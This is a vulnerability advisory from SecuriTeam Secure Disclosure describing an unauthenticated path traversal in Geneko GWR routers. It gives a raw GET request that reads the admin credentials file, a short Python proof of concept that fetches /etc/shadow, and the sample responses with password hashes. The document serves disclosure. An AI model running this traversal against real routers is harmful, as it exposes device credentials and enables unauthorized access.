<p><strong>SSD Advisory – Geneko Routers Unauthenticated Path Traversal</strong></p>
<p><strong>Credit to Author: SSD / Maor Schwartz | Date: Sun, 16 Jul 2017 07:24:56 +0000</strong></p>
<div class="entry-content">
<p><strong>Want to get paid for a vulnerability similar to this one?</strong><br />Contact us at: <a href="mailto:ssd@beyondsecurity.com">ssd@beyondsecurity.com</a></p>
<div class="pf-content">
<p><strong>Vulnerability Summary</strong><br />The following advisory describes an unauthenticated path traversal vulnerability found in the Geneko GWR router series.</p>
<p>Geneko GWG is a compact and cost-effective communications solution that provides cellular capabilities for fixed and mobile applications such as data acquisition, smart metering, remote monitoring and management. GWG supports a variety of radio band options on 2G, 3G and 4G cellular technologies.</p>
<p><strong>Credit</strong><br />An independent security researcher has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program.</p>
<p><strong>Vendor response</strong><br />We informed Geneko of the vulnerability on the 28th of May 2017; the last email we received from them was on the 7th of June 2017. We have no further updates from Geneko regarding the availability of a patch or a workaround for the vulnerability.</p>
<p><strong>Vulnerability Details</strong><br />User-controlled input is not sufficiently sanitized before being passed to a function responsible for accessing the filesystem. Successful exploitation of this vulnerability enables a remote unauthenticated user to read the content of any file on the host, including files located outside the web root folder.</p>
<p>By sending the following GET request, you get direct access to the configuration file, which contains the credentials for the login panel:</p>
<pre>GET /../../../../../../../../../../../../mnt/flash/params/j_admin_admin.params HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Connection: close
Upgrade-Insecure-Requests: 1</pre>
<p>Router response:</p>
<pre>HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 121

{"enable":true,"username":"admin","password":"xxx!","web_access":0,"http_port":80,"https_port":443,"gui_timeout":15}</pre>
<p>In this case, the admin user is configured to have access to the shell (SSH access), as can be seen in /etc/passwd:</p>
<pre>admin:x:0:0:root:/root:/root/cli</pre>
<p><strong>Proof of Concept</strong></p>
<p><u>path_traversal.py</u></p>
<pre>import requests
import sys

# Target host (or host:port) is taken from the command line
domain = sys.argv[1]

# Unauthenticated request; the traversal sequence escapes the web root
r = requests.get("http://" + domain + "/../../../../../etc/shadow")
print(r.text)</pre>
<p>The router will then respond with:</p>
<pre>root:$1$ryjw5yTs$xoQlzavABZ5c7gQuD7jKO0:10933:0:99999:7:::
bin:*:10933:0:99999:7:::
daemon:*:10933:0:99999:7:::
adm:*:10933:0:99999:7:::
lp:*:10933:0:99999:7:::
sync:*:10933:0:99999:7:::
shutdown:*:10933:0:99999:7:::
halt:*:10933:0:99999:7:::
uucp:*:10933:0:99999:7:::
operator:*:10933:0:99999:7:::
nobody:*:10933:0:99999:7:::
admin:$1$72G6z9YF$cs5dS2elxOD3qicUTlEHO/:10933:0:99999:7:::</pre>
</div>
</div>
<p><a href="https://blogs.securiteam.com/index.php/archives/3317" target="bwo">https://blogs.securiteam.com/index.php/feed</a></p>